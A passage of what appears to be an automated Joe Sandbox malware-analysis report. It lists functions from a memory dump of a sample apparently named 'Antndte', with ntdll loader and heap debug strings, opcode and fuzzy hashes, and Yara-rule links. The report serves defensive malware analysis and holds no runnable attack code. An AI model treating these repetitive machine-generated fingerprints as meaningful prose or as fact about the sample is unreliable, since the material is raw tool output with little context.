                                                                                                                                Strings
                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 357B0586
                                                                                                                                • kLsE, xrefs: 357B05FE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                • Opcode ID: d2e819d93f7f1b04dfe2c02d09637246e53083b13d29b298b78177cfeaf20b37
                                                                                                                                • Instruction ID: 850e74fda8729e44485b33546227653585f7701704f31d8f22b82245aea825b1
                                                                                                                                • Opcode Fuzzy Hash: d2e819d93f7f1b04dfe2c02d09637246e53083b13d29b298b78177cfeaf20b37
                                                                                                                                • Instruction Fuzzy Hash: CC51D1B5A08746DFEF20DFA6C444AABB7F5BF44300F00443ED5968B640EBB09A05CB61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357BB5E0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LUx5$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                • API String ID: 0-966721289
                                                                                                                                • Opcode ID: 0e084809e9983e4d1af5f3be1f7173bec9212707b637752221d7df0a391978f6
                                                                                                                                • Instruction ID: 10fa000003e760ec20bc00136cc6efecd560c51317639e459a36e3566662f891
                                                                                                                                • Opcode Fuzzy Hash: 0e084809e9983e4d1af5f3be1f7173bec9212707b637752221d7df0a391978f6
                                                                                                                                • Instruction Fuzzy Hash: 1EB1A875A057048FEB14CF69C894B9EB7B2BF54794F20442AE856EB390DBB0EE40CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E8322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • @, xrefs: 357E84B1
                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 357E847E
                                                                                                                                • LdrpInitializeProcess, xrefs: 357E8342
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 357E8341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                • Opcode ID: bb9430d43ed0c1080b65c9876fde49feb879d44185cd9db662d50ef67193343a
                                                                                                                                • Instruction ID: 5d8096bc29fdb26b8fda8925e9bfffdd5a44a33d3817941b0e1cab5f6b70e6bd
                                                                                                                                • Opcode Fuzzy Hash: bb9430d43ed0c1080b65c9876fde49feb879d44185cd9db662d50ef67193343a
                                                                                                                                • Instruction Fuzzy Hash: F7917C71608340AFE721CE60CC44FABBBEDFB85784F40092EFA859A150E735D944CBA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 35821FE3, 358220BB
                                                                                                                                • .Local, xrefs: 357E27F8
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 35821FE8
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 358220C0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                • Opcode ID: e1b7ccfb0328ecad0579744d66936ede2277d917ad3ece3d394914b83201e56e
                                                                                                                                • Instruction ID: e1de93627ffa675d34323fb3a4a41b292a661867cae1657f0e9543fd955d3624
                                                                                                                                • Opcode Fuzzy Hash: e1b7ccfb0328ecad0579744d66936ede2277d917ad3ece3d394914b83201e56e
                                                                                                                                • Instruction Fuzzy Hash: F0A1BC75A0032D9FDB24CF64D888B99B3B6BF58354F5101EAD80AAB251DB709EC1CF91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357BB360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LUx5$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                • API String ID: 0-288221560
                                                                                                                                • Opcode ID: a58fa0f8e9338e6a3dee81385513345d1865662987a842cf4abf7e0ae272584d
                                                                                                                                • Instruction ID: f3011f733eeb23c851e22bc033f68a48801f37b2475711bd3e7c9de8db9777f7
                                                                                                                                • Opcode Fuzzy Hash: a58fa0f8e9338e6a3dee81385513345d1865662987a842cf4abf7e0ae272584d
                                                                                                                                • Instruction Fuzzy Hash: 09919975A08349CBEF11CF59C844BADB7B1BF00764F544199EC19AB290DBB89E80CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 35810DEC
                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 35810EB5
                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 35810E72
                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 35810E2F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                • Opcode ID: 863dc06a2b55f6152775404300b8da7da671e7c7fbf4e7dbaa066ab2bdb7ae6d
                                                                                                                                • Instruction ID: e8053fc9f5cc441b768cbc97c17a0019dd85f4a36bdd561f59606f411067b376
                                                                                                                                • Opcode Fuzzy Hash: 863dc06a2b55f6152775404300b8da7da671e7c7fbf4e7dbaa066ab2bdb7ae6d
                                                                                                                                • Instruction Fuzzy Hash: 5571C2B5A08704AFDF60CF15C884F877BA9AF84794F400968F9498B246D775D688CFD2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357AF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                • API String ID: 0-2586055223
                                                                                                                                • Opcode ID: d01000682f51dc907e6f3c3c15514b20edb55acd97329bbe238237d103750e03
                                                                                                                                • Instruction ID: 8831ae3ca9ae76de557ec7d4373d0b8b03e93573f66b1446cdf73050739e1a56
                                                                                                                                • Opcode Fuzzy Hash: d01000682f51dc907e6f3c3c15514b20edb55acd97329bbe238237d103750e03
                                                                                                                                • Instruction Fuzzy Hash: C061CF7A248780AFE312CA64CC48F6BB7A9FF84790F040599F9648F291DB74D801CB62
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357A90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                • API String ID: 0-1391187441
                                                                                                                                • Opcode ID: a98d3d1a3edb5729cbad22e5a1d738806e0a875dd269b3774642904e5c463170
                                                                                                                                • Instruction ID: de4d76bce934026aefd5dcefefef15a0d5c86ee9d47fc6c33d3b7b951a1a0f4d
                                                                                                                                • Opcode Fuzzy Hash: a98d3d1a3edb5729cbad22e5a1d738806e0a875dd269b3774642904e5c463170
                                                                                                                                • Instruction Fuzzy Hash: 55319C76A10208FFDB01CB58DC89F9AB7B9EB457A0F1141A5E815AF3A1DB30ED40CE60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357F1190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e~5
                                                                                                                                • API String ID: 0-100141299
                                                                                                                                • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                • Instruction ID: 9d206d7aac299be9322c4f9847a28e1da3f5c84be4603553b7d48212e86af776
                                                                                                                                • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                • Instruction Fuzzy Hash: ED314371A00659BFDB11CBD5CC44EDEBB79FB84750F104025E915AB260DB31DE459BA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B7072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                • Opcode ID: 180a7439075c8761d9a0e979645dc1bfbc8de759de77bb815e700adffcdfc3f4
                                                                                                                                • Instruction ID: db1ef58a36c6af5b6799528a255e0b40c86d99f3eadd77ed2effd391c1bbd642
                                                                                                                                • Opcode Fuzzy Hash: 180a7439075c8761d9a0e979645dc1bfbc8de759de77bb815e700adffcdfc3f4
                                                                                                                                • Instruction Fuzzy Hash: D151E175A04709EFEB05DF68C888BEDB7B6FF44355F10416AE4129B390EBB49A11CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 35843608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                • API String ID: 0-1168191160
                                                                                                                                • Opcode ID: b4c39b8d061b2a4cdbf1e4fd007305e3fdbfcf43dc1fec71849360696b045ffd
                                                                                                                                • Instruction ID: a45016311a24e7932b3c4f043bd72b505806c6e6a30ac6886b8400452942396c
                                                                                                                                • Opcode Fuzzy Hash: b4c39b8d061b2a4cdbf1e4fd007305e3fdbfcf43dc1fec71849360696b045ffd
                                                                                                                                • Instruction Fuzzy Hash: 94F16CF5A0432C8BDB21CB18CC80B99B7B5BF44754F9480E9DA49A7240EB719EC5CF98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357DF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 358200C7
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 358200F1
                                                                                                                                • RTL: Re-Waiting, xrefs: 35820128
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                • Opcode ID: cb386331ee408c6ce5cb23449d9756ba0f2c2aeb31dd22c8b727531815ac05b9
                                                                                                                                • Instruction ID: 2633f74b320e37acd43ed15dd570c3cec98af903f45b882ab17e6f11f1c25fbb
                                                                                                                                • Opcode Fuzzy Hash: cb386331ee408c6ce5cb23449d9756ba0f2c2aeb31dd22c8b727531815ac05b9
                                                                                                                                • Instruction Fuzzy Hash: ABE1BD74608741DFE711CF28C894B0ABBE2BF84364F100A5DF5A58B2E1DB75E986CB52
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3583330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                • API String ID: 0-2391371766
                                                                                                                                • Opcode ID: 57aa59d6707f41eb8f3f4c4eafdfbc36610785ceb2ba5039adaa84de59f3d62d
                                                                                                                                • Instruction ID: 57de3f917564197e57b23a24555ac970da7a5efaf9390b3be4aa58aeb1963ebf
                                                                                                                                • Opcode Fuzzy Hash: 57aa59d6707f41eb8f3f4c4eafdfbc36610785ceb2ba5039adaa84de59f3d62d
                                                                                                                                • Instruction Fuzzy Hash: 7CB1BD7960A345AFE312CF55D886B5BB3E8BB44750F444929FA509B290DFB1EC08CBD2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357AA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                • API String ID: 0-2779062949
                                                                                                                                • Opcode ID: 2df942dcd1836706760be9f8893f18d0e67f580ad29abf9656273ce7512fff6e
                                                                                                                                • Instruction ID: 274eb87fdd788e9294093612a0236b797f0515955a6ad7c1fb4e985f18d25a85
                                                                                                                                • Opcode Fuzzy Hash: 2df942dcd1836706760be9f8893f18d0e67f580ad29abf9656273ce7512fff6e
                                                                                                                                • Instruction Fuzzy Hash: F5A17D76911629ABDB21DF64CC88BDAB7B9FF04704F1001EAE909AB250DB359EC5CF50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357AF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3580E455
                                                                                                                                • HEAP[%wZ]: , xrefs: 3580E435
                                                                                                                                • HEAP: , xrefs: 3580E442
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                • API String ID: 0-1340214556
                                                                                                                                • Opcode ID: 2e5b6646b843982b70c688fbc5c4bf299c7f537b292a297b0887e6367edfa2f4
                                                                                                                                • Instruction ID: 960a0b6109d28b0385d46fcfc1ec4ae4d7ac6704e6a2ec89bae0be48e0654bac
                                                                                                                                • Opcode Fuzzy Hash: 2e5b6646b843982b70c688fbc5c4bf299c7f537b292a297b0887e6367edfa2f4
                                                                                                                                • Instruction Fuzzy Hash: 1C51D07A604B84AFE312CBA8C888F9ABBF9FF04344F0442A5E5518B792D774ED41CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357D1514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpCompleteMapModule, xrefs: 3581A39D
                                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 3581A3A7
                                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3581A396
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                • API String ID: 0-1676968949
                                                                                                                                • Opcode ID: 03875a8d0ed5cd0a4e257358976746827af052fa81cbfb2bbba5631a71321e0c
                                                                                                                                • Instruction ID: 48a3177cb3fb2a7c25ac6572f44eed59e13df95809abea62972ecbec7839542c
                                                                                                                                • Opcode Fuzzy Hash: 03875a8d0ed5cd0a4e257358976746827af052fa81cbfb2bbba5631a71321e0c
                                                                                                                                • Instruction Fuzzy Hash: 7A51E278B08785DBE712CB69D944B5AB7F6BB04794F1001A4ED939F6D1DB78EA00CB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3585D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • HEAP[%wZ]: , xrefs: 3585D792
                                                                                                                                • HEAP: , xrefs: 3585D79F
                                                                                                                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3585D7B2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                • API String ID: 0-3815128232
                                                                                                                                • Opcode ID: e8591733328556e6e560362ddfa251bd66ae3d100837b26f911b627c72e787b2
                                                                                                                                • Instruction ID: c56c98e6cf36422dee36969305d48ab1a7139f948e0aedcb91dd216800ac17d0
                                                                                                                                • Opcode Fuzzy Hash: e8591733328556e6e560362ddfa251bd66ae3d100837b26f911b627c72e787b2
                                                                                                                                • Instruction Fuzzy Hash: 37512579106354CEE350CA39C84477273E1EB452ADF528C89ECC68B285EB75DE47DBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357A753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                • API String ID: 0-1151232445
                                                                                                                                • Opcode ID: b997681613c6be527bd91a6c07b2adcc0be0a644981e36bdc4a2bd7962e94e35
                                                                                                                                • Instruction ID: ff57a9adc2b03a261f6dcd4ce8fe21b3429b46cc1d7741b35674e6d4fb4eea4e
                                                                                                                                • Opcode Fuzzy Hash: b997681613c6be527bd91a6c07b2adcc0be0a644981e36bdc4a2bd7962e94e35
                                                                                                                                • Instruction Fuzzy Hash: 6D41637A204380AFEB15CF18C884BF577E2AF41344F6441A9CC868F752CB64D84ACF61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E15EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35821943
                                                                                                                                • LdrpAllocateTls, xrefs: 3582194A
                                                                                                                                • minkernel\ntdll\ldrtls.c, xrefs: 35821954
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
